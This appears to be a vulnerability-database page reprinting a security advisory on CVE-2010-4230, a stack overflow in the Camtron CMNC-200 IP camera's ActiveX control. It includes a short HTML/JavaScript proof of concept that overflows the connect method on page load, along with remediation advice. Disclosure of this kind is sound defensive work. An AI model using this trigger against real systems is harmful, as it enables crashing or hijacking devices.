Lucene search
Trustwaves SpiderLabsEXPLOITPACK:FEEB4D7FF53CD63754F12915E6EB8D70HistoryNov 13, 2010 - 12:00 a.m.
Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow
2010-11-1300:00:00
Trustwaves SpiderLabs
11
EPSS
0.094
Percentile
94.8%
Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow
Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230
The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.
The example code below triggers the vulnerability.
<html>
<head><title>IPcam POC</title>
<script>
function Check(){
var bf1 = 'A';
while (bf1.length <= 6144) bf1 = bf1 + 'A';
obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.Related
prion
prion
Stack overflow
2010-11-17 01:00:00
cve
cve
CVE-2010-4230
2010-11-17 01:00:03
nvd
nvd
CVE-2010-4230
2010-11-17 01:00:03
cvelist
cvelist
CVE-2010-4230
2010-11-16 23:00:00
exploitdb
exploitdb
Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow
2010-11-13 00:00:00
seebug
seebug
Camtron CMNC-200 IP Camera ActiveX Buffer Overflow Vulnerability
2014-07-01 00:00:00
securityvulns
securityvulns
Camtron CMNC-200 camera multiple security vulnerabilities
2010-11-18 00:00:00
TWSL2010-006: Multiple Vulnerabilities in Camtron CMNC-200 IP Camera
2010-11-18 00:00:00
packetstorm
packetstorm
Camtron CMNC-200 IP Camera Traversal / Overflow / Bypass / Denial Of Service
2010-11-12 00:00:00